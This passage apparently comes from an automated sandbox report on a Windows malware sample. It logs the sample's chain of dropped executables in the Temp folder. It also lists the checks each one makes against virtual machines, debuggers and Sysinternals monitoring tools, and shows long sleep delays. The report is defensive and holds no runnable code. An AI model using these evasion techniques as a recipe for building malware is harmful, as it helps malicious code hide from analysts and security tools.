                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\AppData\Local\Temp\3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: DE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 3380000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 31C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 66A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 76A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 77D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 87D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 66A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 76A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 8A30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 9A30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: AA30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: BA30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: BEF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: CEF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 66A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 76A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 86A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 96A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 76A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 86A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 86A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: A6A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 7440000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: 8440000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeMemory allocated: 1B50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeMemory allocated: 3A50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeMemory allocated: 3870000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeWindow / User API: threadDelayed 9749Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWindow / User API: threadDelayed 4942Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWindow / User API: threadDelayed 4367Jump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winrar-x64-701.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\3.exe TID: 7504Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exe TID: 7516Thread sleep count: 100 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exe TID: 7516Thread sleep count: 9749 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exe TID: 7996Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exe TID: 7928Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exe TID: 7952Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DDB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E1DDB190
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DC40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E1DC40BC
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DEFCA0 FindFirstFileExA,0_2_00007FF7E1DEFCA0
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B6BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_00B6BA94
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B7D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_00B7D420
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EDBA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,6_2_00EDBA94
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EED420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,6_2_00EED420
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DE16A4 VirtualQuery,GetSystemInfo,0_2_00007FF7E1DE16A4
                  Source: C:\Users\user\AppData\Local\Temp\3.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: 4.exe, 00000001.00000002.1703118557.00000000008D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: 3.exe, 00000002.00000002.4145534188.0000000000594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\l
                  Source: r.exe, 00000007.00000002.2164011988.00000000017DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
                  Source: 3.exe, 00000002.00000002.4145534188.0000000000594000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkflo
                  Source: C:\Users\user\AppData\Local\Temp\4.exeAPI call chain: ExitProcess graph end nodegraph_1-24674
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeAPI call chain: ExitProcess graph end nodegraph_6-25753
                  Source: C:\Users\user\AppData\Local\Temp\3.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\3.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeOpen window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\r.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\r.exeOpen window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\r.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\r.exeOpen window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\r.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DE3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7E1DE3170
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B891B0 mov eax, dword ptr fs:[00000030h]1_2_00B891B0
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EF91B0 mov eax, dword ptr fs:[00000030h]6_2_00EF91B0
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DF0D20 GetProcessHeap,0_2_00007FF7E1DF0D20
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\r.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DE3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7E1DE3170
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DE2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7E1DE2510
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DE3354 SetUnhandledExceptionFilter,0_2_00007FF7E1DE3354
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DE76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7E1DE76D8
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B80A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00B80A0A
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B80B9D SetUnhandledExceptionFilter,1_2_00B80B9D
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B80D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00B80D8A
                  Source: C:\Users\user\AppData\Local\Temp\4.exeCode function: 1_2_00B84FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00B84FEF
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EF0A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00EF0A0A
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EF0B9D SetUnhandledExceptionFilter,6_2_00EF0B9D
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EF0D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00EF0D8A
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeCode function: 6_2_00EF4FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00EF4FEF
                  Source: C:\Users\user\AppData\Local\Temp\3.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeCode function: 0_2_00007FF7E1DDB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E1DDB190
                  Source: C:\Users\user\Desktop\KR6CT3hIxT.exeProcess created: C:\Users\user\AppData\Local\Temp\4.exe "C:\Users\user\AppData\Local\Temp\4.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4.exeProcess created: C:\Users\user\AppData\Local\Temp\3.exe "C:\Users\user\AppData\Local\Temp\3.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3.exeProcess created: C:\Users\user\AppData\Local\Temp\rdegje.exe "C:\Users\user\AppData\Local\Temp\rdegje.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rdegje.exeProcess created: C:\Users\user\AppData\Local\Temp\r.exe "C:\Users\user\AppData\Local\Temp\r.exe" Jump to behavior
